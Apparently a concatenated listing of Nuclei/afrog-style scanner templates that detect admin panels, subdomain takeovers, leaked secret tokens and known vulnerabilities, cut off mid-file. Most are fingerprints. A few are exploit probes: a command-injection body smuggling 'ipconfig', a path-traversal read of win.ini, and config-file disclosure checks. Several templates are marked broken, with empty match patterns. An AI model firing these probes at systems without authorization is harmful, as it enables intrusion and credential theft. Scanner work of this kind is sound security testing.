-------------------------------------------------------------------------------- /aws/aws-access-key-value.yaml: -------------------------------------------------------------------------------- 1 | id: aws-access-key-value 2 | 3 | info: 4 | name: AWS Access Key ID Value 5 | author: Swissky 6 | severity: info 7 | tags: exposure,token,aws,amazon 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 19 | -------------------------------------------------------------------------------- /braintree-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: braintree-access-token 2 | 3 | info: 4 | name: PayPal Braintree Access Token Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,paypal 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' 18 | -------------------------------------------------------------------------------- /c-unauthorized/jeecg-boot.yaml: -------------------------------------------------------------------------------- 1 | id: jeecg-boot-unauth 2 | 3 | info: 4 | name: Jeecg Boot Unauth 5 | author: zan8in 6 | severity: high 7 | verified: true 8 | description: | 9 | fofa: title="Jeecg-Boot" 10 | 11 | rules: 12 | r0: 13 | request: 14 | method: GET 15 | path: /jeecg-boot/ 16 | expression: response.status == 200 && response.body.bcontains(b'Swagger-Bootstrap-UI') 17 | expression: r0() -------------------------------------------------------------------------------- /c-unauthorized/ruoyi-druid-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: ruoyi-druid-unauth 2 | 3 | info: 4 | name: 若依管理系统未授权访问 5 | author: Str1am 6 | severity: high 7 | verified: 
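true

rules:
  r0:
    request:
      method: GET
      path: /prod-api/druid/websession.html
    # The second bcontains() is implied by the first ('Druid Web Session Stat'
    # already contains 'Web Session Stat'); kept as the author wrote it.
    expression: response.status == 200 && response.body.bcontains(b'Druid Web Session Stat') && response.body.bcontains(b'Web Session Stat')
expression: r0()
--------------------------------------------------------------------------------
/cloudinary-credentials.yaml:
--------------------------------------------------------------------------------
id: cloudinary-credentials

info:
  name: Cloudinary Credentials Disclosure
  author: Ice3man
  severity: info
  tags: exposure,token,cloudinary

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        part: body
        regex:
          - 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+'
--------------------------------------------------------------------------------
/e-vulnerability/svn-leak.yaml:
--------------------------------------------------------------------------------
id: svn-leak

info:
  # Fixed: "SVM" -> "SVN" (the rule probes the Subversion metadata file /.svn/entries).
  name: SVN 代码托管泄漏
  author: zan8in
  severity: high
  verified: true

rules:
  r0:
    request:
      method: GET
      path: /.svn/entries
    expression: response.status == 200 && ("file\n".bmatches(response.body) || "dir\n".bmatches(response.body)) && "([0-9]){4}-([0-9]){2}-([0-9]){2}(.*)Z\n".bmatches(response.body)
expression: r0()
--------------------------------------------------------------------------------
/empirecms-detect.yaml:
--------------------------------------------------------------------------------
id: empirecms-detect

info:
  name: EmpireCMS Detect
  author: princechaddha
  severity: info
  metadata:
    shodan-query: http.html:EmpireCMS
  tags: tech,empirecms

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: regex
        part: body
        regex:
          # NOTE(review): the pattern is empty here — most likely an HTML-looking
          # fingerprint that was stripped when this listing was extracted. An
          # empty regex matches every response, so as written this template
          # would report EmpireCMS on every host; restore the original pattern
          # before relying on it.
          - ''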
-------------------------------------------------------------------------------- /hmc-hybris-panel.yaml: -------------------------------------------------------------------------------- 1 | id: hmc-hybris-panel 2 | 3 | info: 4 | name: SAP Hybris Management Console 5 | author: dogasantos 6 | severity: info 7 | tags: panel,sap 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/hmc/hybris" 13 | - "{{BaseURL}}/hybris/hmc/hybris" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "hybris Management Console" 19 | part: body 20 | -------------------------------------------------------------------------------- /pentaho-panel.yaml: -------------------------------------------------------------------------------- 1 | id: pentaho-panel 2 | 3 | info: 4 | name: Pentaho Panel 5 | author: princechaddha,dhiyaneshDK 6 | severity: info 7 | metadata: 8 | shodan-query: pentaho 9 | tags: panel,pentaho 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/pentaho/Login' 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Pentaho User Console - Login' 20 | -------------------------------------------------------------------------------- /perl-status.yaml: -------------------------------------------------------------------------------- 1 | id: perl-status 2 | 3 | info: 4 | name: Apache mod_perl Status Page Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: config,exposure,apache,status 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/perl-status' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Apache2::Status" 17 | - "Perl version" 18 | condition: and 19 | -------------------------------------------------------------------------------- /sap-router.yaml: -------------------------------------------------------------------------------- 1 | id: sap-router 2 | 3 | info: 4 | name: SAPRouter Detection 5 | author: randomstr1ng 6 | severity: info 7 | tags: network,sap 8 | 9 | network: 10 | - inputs: 11 | - data: 
57484f415245594f553f0a 12 | type: hex 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Host}}:3299" 17 | read-size: 1024 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "SAProuter" -------------------------------------------------------------------------------- /struts-debug-mode.yaml: -------------------------------------------------------------------------------- 1 | id: struts-debug-mode 2 | 3 | info: 4 | name: Apache Struts setup in Debug-Mode 5 | author: pdteam 6 | severity: low 7 | tags: logs,struts,apache,exposure,setup 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "<debug>" 18 | - "<struts.actionMapping>" 19 | condition: and 20 | -------------------------------------------------------------------------------- /symfony/symfony-detect.yaml: -------------------------------------------------------------------------------- 1 | id: symfony-detect 2 | info: 3 | name: Detect Symfony Software 4 | author: grant 5 | severity: info 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/_fragment" 10 | matchers-condition: and 11 | matchers: 12 | - type: status 13 | status: 14 | - 403 15 | - type: word 16 | words: 17 | - "The Symfony Project" 18 | part: all 19 | -------------------------------------------------------------------------------- /vend-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: vend-takeover 2 | 3 | info: 4 | name: vend takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Looks like you've traveled too far into cyberspace. 
-------------------------------------------------------------------------------- /zentral-detection.yaml: -------------------------------------------------------------------------------- 1 | id: zentral-detection 2 | 3 | info: 4 | name: Zentral Detection 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | redirects: true 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - '<title>Zentral' 19 | - '<div class="panel-footer btn-group btn-group-justified"' 20 | -------------------------------------------------------------------------------- /a-fingerprinting/minio-browser.yaml: -------------------------------------------------------------------------------- 1 | id: minio-browser 2 | 3 | info: 4 | name: MinIO Browser 5 | author: pikpikcu 6 | severity: info 7 | verified: true 8 | description: | 9 | shodan-query: title:"MinIO Browser" 10 | 11 | rules: 12 | r0: 13 | request: 14 | method: GET 15 | path: /minio/login 16 | expression: response.status == 200 && response.body.ibcontains(b'<title>minio browser') 17 | expression: r0() -------------------------------------------------------------------------------- /checkmarx-panel.yaml: -------------------------------------------------------------------------------- 1 | id: checkmarx-panel-detect 2 | 3 | info: 4 | name: Checkmarx WebClient detector 5 | author: joanbono 6 | severity: info 7 | tags: panel,checkmarx 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/cxwebclient/Login.aspx" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '/CxWebClient/webApp/Scripts/libs/authenticationScripts' 18 | part: body 19 | -------------------------------------------------------------------------------- /drupal/drupal-install.yaml: -------------------------------------------------------------------------------- 1 | id: drupal-install 2 | 3 | info: 4 | name: Drupal Install 5 | author: NkxxkN 6 | severity: low 7 | tags: 
exposure,drupal 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/install.php?profile=default" 13 | 14 | redirects: true 15 | max-redirects: 1 16 | matchers: 17 | - type: word 18 | words: 19 | - "Choose language | Drupal" 20 | -------------------------------------------------------------------------------- /google/google-mapsembed.yaml: -------------------------------------------------------------------------------- 1 | id: api-googlemapsembed 2 | 3 | info: 4 | name: Google Maps Embed API Test 5 | author: zzeitlin 6 | severity: info 7 | tags: token-spray,google,maps,embed 8 | 9 | self-contained: true 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /helpjuice-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: helpjuice-takeover 2 | 3 | info: 4 | name: helpjuice takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - We could not find what you're looking for. 
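--------------------------------------------------------------------------------
/jiva-admin-exposure.yaml:
--------------------------------------------------------------------------------
id: active-admin-exposure

info:
  # NOTE(review): the id and name say ActiveAdmin, but the file name, the request
  # path (/admin/login.jsp) and the matcher below all refer to the Jive
  # Administration Console — the metadata looks copied from another template
  # and should be aligned so findings are labelled correctly.
  name: ActiveAdmin Admin Dashboard Exposure
  author: pdteam
  severity: info
  tags: panel
#Try This /admin;/main.jsp

requests:
  - raw:
      - |
        GET /admin/login.jsp HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        words:
          - "Jive Administration Console"
--------------------------------------------------------------------------------
/netscalar-aaa-login.yaml:
--------------------------------------------------------------------------------
id: netscalar-aaa-login

info:
  # Fixed: product name spelt "NetScaler", matching the matcher string below.
  name: NetScaler AAA Login Panel
  author: dhiyaneshDk
  severity: info
  reference: https://www.exploit-db.com/ghdb/6898

requests:
  - method: GET
    path:
      - '{{BaseURL}}/logon/LogonPoint/tmindex.html'
    matchers:
      - type: word
        words:
          - "NetScaler AAA"
        condition: and
--------------------------------------------------------------------------------
/sonicwall-management-panel.yaml:
--------------------------------------------------------------------------------
id: sonicwall-management-panel

info:
  name: SonicWall Management Panel
  author: PR3R00T
  severity: info
  tags: panel,sonicwall

requests:
  - method: GET
    path:
      - "{{BaseURL}}/auth.html"
    matchers:
      - type: word
        words:
          - "SonicWall - Authentication"
          - "SonicWall Administrator"
--------------------------------------------------------------------------------
/wishpond-takeover.yaml:
--------------------------------------------------------------------------------
id: wishpond-takeover

info:
  name: wishpond takeover detection
  author: pdteam
  severity: high
  reference:
    -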
https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - https://www.wishpond.com/404?campaign=true -------------------------------------------------------------------------------- /X-Remote-IP.yaml: -------------------------------------------------------------------------------- 1 | id: x-remote-ip 2 | 3 | info: 4 | name: x-remote-ip 5 | author: Kabilan S 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | # Example of sending some headers to the servers 11 | headers: 12 | 13 | X-Remote-IP: "evil.com" 14 | path: 15 | - "{{BaseURL}}/" 16 | matchers: 17 | - type: word 18 | words: 19 | - "evil.com_is_back.__we_get_it.__check_back_daily" 20 | -------------------------------------------------------------------------------- /a-fingerprinting/thinkphp-detect.yaml: -------------------------------------------------------------------------------- 1 | id: thinkphp-detect 2 | 3 | info: 4 | name: ThinkPHP detect 5 | author: zan8in 6 | severity: info 7 | verified: true 8 | description: fofa app="ThinkPHP" 9 | 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /index.php?m=1 15 | expression: '"ThinkPHP([0-9]+.[0-9]+.[0-9]+)".bmatches(response.body)' 16 | expression: r0() 17 | -------------------------------------------------------------------------------- /a-fingerprinting/wayos-panel.yaml: -------------------------------------------------------------------------------- 1 | id: wayos-panel 2 | 3 | info: 4 | name: WAYOS-智能路由管理系统 5 | author: zan8in 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /login.html 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(b'维盟(WayOS)') && response.body.bcontains(b'www.wayos.cn') 17 | 18 | expression: r0() -------------------------------------------------------------------------------- 
/airflow-configuration-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: airflow-configuration-exposure 2 | 3 | info: 4 | name: Apache Airflow Configuration Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: exposure,config,airflow,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/airflow.cfg' 13 | matchers: 14 | - type: word 15 | words: 16 | - '[core]' 17 | - '[api]' 18 | condition: and -------------------------------------------------------------------------------- /apache/apache-dubbo-detect.yaml: -------------------------------------------------------------------------------- 1 | id: apache-dubbo-detect 2 | 3 | info: 4 | name: Apache dubbo detect 5 | author: ffffffff0x 6 | severity: info 7 | metadata: 8 | fofa-query: app="APACHE-dubbo" 9 | tags: apache,dubbo,tech 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "Basic realm=\"dubbo\"" 21 | -------------------------------------------------------------------------------- /cve/2020/CNVD-2020-57264.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2020-57264 2 | 3 | info: 4 | name: e-zkeco-CNVD-2020-57264-read-file 5 | author: ThestaRY (https://github.com/ThestaRY7/) 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /iclock/ccccc/windows/win.ini 13 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /cx-cloud-upload-detect.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-upload-detect 2 | 3 | info: 4 | name: CX Cloud Unauthenticated Upload Detect 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: upload 8 | 9 | requests: 10 | - method: GET 11 | 
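# … continuation of /cx-cloud-upload-detect.yaml (its `requests:` header precedes this span) …
    path:
      - '{{BaseURL}}/upload.jsp'
    matchers:
      - type: word
        words:
          - "Display file upload form to the user"
        condition: and
--------------------------------------------------------------------------------
/default-iis7-page.yaml:
--------------------------------------------------------------------------------
id: default-iis7-page

info:
  name: IIS-7 Default Page
  author: dhiyaneshDk
  severity: info
  reference:
    - https://www.shodan.io/search?query=http.title%3A%22IIS7%22
  tags: tech,iis

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        words:
          - "IIS7"
        part: body
--------------------------------------------------------------------------------
/e-vulnerability/wordpress-wpconfig-inclosure.yaml:
--------------------------------------------------------------------------------
id: wordpress-wpconfig-inclosure

info:
  name: Wordpress wpconfig disclosure
  author: zhizhuo
  severity: high
  # NOTE(review): re-confirm this flag — the rule expression below was not a
  # valid check before the fix, so the template cannot have been verified as is.
  verified: true

rules:
  r0:
    request:
      method: GET
      path: /wp-config.php.save
    # Fixed: the expression used a single `=` where every other rule in this
    # collection uses `==` for comparison, and misspelt bcontains() as
    # bcontais(); as written it could not evaluate as intended.
    expression: response.status == 200 && response.body.bcontains(b'define') && response.body.bcontains(b'SECURE_AUTH_KEY')
expression: r0()
--------------------------------------------------------------------------------
/emqx-detection.yaml:
--------------------------------------------------------------------------------
id: emqx-detection

info:
  name: Emqx Detection
  author: For3stCo1d
  severity: info
  tags: tech,emqx

requests:
  - method: GET
    path:
      - "{{BaseURL}}/static/emq.ico"

    matchers-condition: and
    matchers:
      - type: dsl
        name: favicon
        dsl:
          - "status_code==200 && ('-670975485' == mmh3(base64_py(body)))"
--------------------------------------------------------------------------------
/fcm-server-key.yaml: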
-------------------------------------------------------------------------------- 1 | id: fcm-server-key 2 | 3 | info: 4 | name: FCM Server Key 5 | author: absshax 6 | severity: high 7 | reference: 8 | - https://abss.me/posts/fcm-takeover 9 | tags: exposure,token,google 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | extractors: 17 | - type: regex 18 | part: body 19 | regex: 20 | - "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}" -------------------------------------------------------------------------------- /google/google-calendar-link.yaml: -------------------------------------------------------------------------------- 1 | id: google-calendar-link 2 | 3 | info: 4 | name: Google Calendar URI Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,google 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+' -------------------------------------------------------------------------------- /hashicorp-consul-version.yaml: -------------------------------------------------------------------------------- 1 | id: hashicorp-consul-version 2 | 3 | info: 4 | name: Hashicorp Consul Version Detection 5 | author: c-sh0 6 | severity: info 7 | description: Obtain Consul Version Information 8 | tags: tech,consul,api 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/v1/agent/self" 14 | 15 | extractors: 16 | - type: json 17 | json: 18 | - " .Config.Version" 19 | 20 | -------------------------------------------------------------------------------- /jetbrains-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: jetbrains-takeover 2 | 3 | info: 4 | name: jetbrains takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: 
takeover,jetbrains 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | matchers: 16 | - type: word 17 | words: 18 | - is not a registered InCloud YouTrack. 19 | -------------------------------------------------------------------------------- /unbounce-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: unbounce-takeover 2 | 3 | info: 4 | name: unbounce takeover detection 5 | author: pdcommunity 6 | severity: info 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: regex 17 | regex: 18 | - "^The requested URL was not found on this server.$" -------------------------------------------------------------------------------- /wangshen-file.yaml: -------------------------------------------------------------------------------- 1 | id: wangshen-file-xielu 2 | 3 | info: 4 | name: wangshen-file-xielu 5 | author: str1am 6 | severity: high 7 | reference: 8 | - http://www.2cto.com/article/201405/304552.html 9 | tags: wangshen,file 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "/boot/phpConfig/tb_admin.txt" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 -------------------------------------------------------------------------------- /Airflow-unauthorized.yaml: -------------------------------------------------------------------------------- 1 | id: Airflow-unauthorized 2 | 3 | info: 4 | name: Airflow未授权访问 5 | author: Str1am 6 | severity: high 7 | reference: http://www.str1am.top 8 | tags: Airflow,unauthorized 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/admin/" 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Airflow - DAGs" 19 | condition: and 20 | -------------------------------------------------------------------------------- /airee-takeover.yaml: 
-------------------------------------------------------------------------------- 1 | id: airee-takeover 2 | 3 | info: 4 | name: Airee Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | name: airee 19 | words: 20 | - 'Ошибка 402. Сервис Айри.рф не оплачен' -------------------------------------------------------------------------------- /cx-cloud-login-1.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-login1 2 | 3 | info: 4 | name: CX Cloud 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET / HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 16 | matchers: 17 | - type: word 18 | words: 19 | - "CX Cloud" -------------------------------------------------------------------------------- /e-vulnerability/kingsoft-v8-rce.yaml: -------------------------------------------------------------------------------- 1 | id: kingsoft-v8-rce 2 | 3 | info: 4 | name: 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞 5 | author: zan8in 6 | severity: critical 7 | verified: false 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: POST 13 | path: /inter/pdf_maker.php 14 | body: "url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx" 15 | expression: response.status == 200 && response.body.bcontains(b'Windows IP') 16 | expression: r0() -------------------------------------------------------------------------------- /e-vulnerability/thinkcmf-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: thinkcmf-lfi 2 | 3 | info: 4 | name: Thinkcmf lfi 5 | author: JerryKing 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: 
/?a=display&templateFile=README.md 13 | expression: response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /elmah-log-file.yaml: -------------------------------------------------------------------------------- 1 | id: elmah-log-file 2 | 3 | info: 4 | name: elmah.axd Disclosure 5 | author: shine 6 | severity: medium 7 | tags: logs,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/elmah.axd" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - 'Error Log for' 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /gradle-enterprise-build-cache-detect.yaml: -------------------------------------------------------------------------------- 1 | id: gradle-enterprise-build-cache-detect 2 | 3 | info: 4 | name: Gradle Enterprise Build Cache Node Detection 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | redirects: true 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Gradle Enterprise Build Cache Node' 19 | -------------------------------------------------------------------------------- /helpscout-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: helpscout-takeover 2 | 3 | info: 4 | name: helpscout takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | 18 | - type: word 19 | words: 20 | - "No settings were found for this company:" -------------------------------------------------------------------------------- 
/misconfigured-concrete5.yaml: -------------------------------------------------------------------------------- 1 | id: misconfigured-concrete5 2 | 3 | info: 4 | name: Misconfigured Concrete5 5 | author: pdteam 6 | severity: low 7 | tags: misconfig,concrete,cms 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: word 18 | part: body 19 | words: 20 | - 'concrete5 has encountered an issue' -------------------------------------------------------------------------------- /network-camera-detect.yaml: -------------------------------------------------------------------------------- 1 | id: network-camera-detect 2 | 3 | info: 4 | name: Various Online Devices Detection (Network Camera) 5 | author: iamthefrogy 6 | severity: info 7 | tags: iot 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/CgiStart?page=Single" 13 | redirects: true 14 | max-redirects: 2 15 | matchers: 16 | - type: word 17 | words: 18 | - Network Camera 19 | -------------------------------------------------------------------------------- /ngrok-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: ngrok-takeover 2 | 3 | info: 4 | name: ngrok takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - ngrok.io not found 20 | - Tunnel *.ngrok.io not found -------------------------------------------------------------------------------- /rails-debug-mode.yaml: -------------------------------------------------------------------------------- 1 | id: rails-debug-mode 2 | 3 | info: 4 | name: Rails Debug Mode 5 | author: pdteam 6 | severity: medium 7 | tags: debug,rails,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - 
"{{BaseURL}}/{{randstr}}" 13 | 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - "Rails.root:" 19 | - "Action Controller: Exception caught" 20 | condition: and -------------------------------------------------------------------------------- /slack-webhook-token.yaml: -------------------------------------------------------------------------------- 1 | id: slack-webhook-token 2 | 3 | info: 4 | name: Slack Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,slack 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}" -------------------------------------------------------------------------------- /somfy-login.yaml: -------------------------------------------------------------------------------- 1 | id: somfy-login 2 | 3 | info: 4 | name: Somfy Login Page 5 | author: DhiyaneshDK 6 | severity: info 7 | tags: panel,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/m_login.htm' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Home motion by Somfy 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /amazon-mws-auth-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-mws-auth-token 2 | 3 | info: 4 | name: Amazon MWS Auth Token 5 | author: puzzlepeaches 6 | severity: info 7 | tags: exposure,token,aws,amazon,auth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" 19 | -------------------------------------------------------------------------------- /api/api-c99.yaml: 
-------------------------------------------------------------------------------- 1 | id: api-c99 2 | 3 | info: 4 | name: C99 API Test 5 | author: 0ri2N 6 | severity: info 7 | reference: 8 | - https://api.c99.nl 9 | tags: c99,api,dns,token-spray 10 | 11 | self-contained: true 12 | requests: 13 | - method: GET 14 | path: 15 | - https://api.c99.nl/ping?key={{token}}&host=1.1.1.1 16 | 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "PING 1.1.1.1" 22 | -------------------------------------------------------------------------------- /citrix-adc-gateway-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-adc-gateway-panel 2 | 3 | info: 4 | name: Citrix ADC Gateway detect 5 | author: organiccrap 6 | severity: info 7 | tags: panel,citrix 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/logon/LogonPoint/index.html' 13 | - '{{BaseURL}}/logon/LogonPoint/custom.html' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - '_ctxstxt_CitrixCopyright' 19 | -------------------------------------------------------------------------------- /cve/2021/CVE-2021-29622.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-29622 2 | 3 | info: 4 | name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect 5 | author: fuzz7j(https://github.com/fuzz7j) 6 | severity: medium 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /new/newhttps:/baidu.com 13 | expression: response.status == 302 && response.headers["location"] == "https:/baidu.com?" 
14 | expression: r0() 15 | -------------------------------------------------------------------------------- /cx-cloud-login-2.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-login2 2 | 3 | info: 4 | name: CX Cloud 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /cxcum/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 16 | matchers: 17 | - type: word 18 | words: 19 | - "CX Cloud" -------------------------------------------------------------------------------- /e-vulnerability/sangfor-vpn-supersession-rce.yaml: -------------------------------------------------------------------------------- 1 | id: sangfor-vpn-supersession-rce 2 | 3 | info: 4 | name: Sangfor VPN SuperSession TO RCE 5 | author: G-H-Z 6 | severity: critical 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /por/login_auth.csp 14 | expression: response.status == 200 && response.body.bcontains(b'') && response.body.bcontains(b'') # review: both bcontains(b'') checks are empty and therefore always true, so any HTTP 200 on /por/login_auth.csp is reported as a critical RCE; the intended fingerprint strings appear to have been lost in export and must be restored before this template is used 15 | expression: r0() -------------------------------------------------------------------------------- /exposed-kafdrop.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-kafdrop 2 | 3 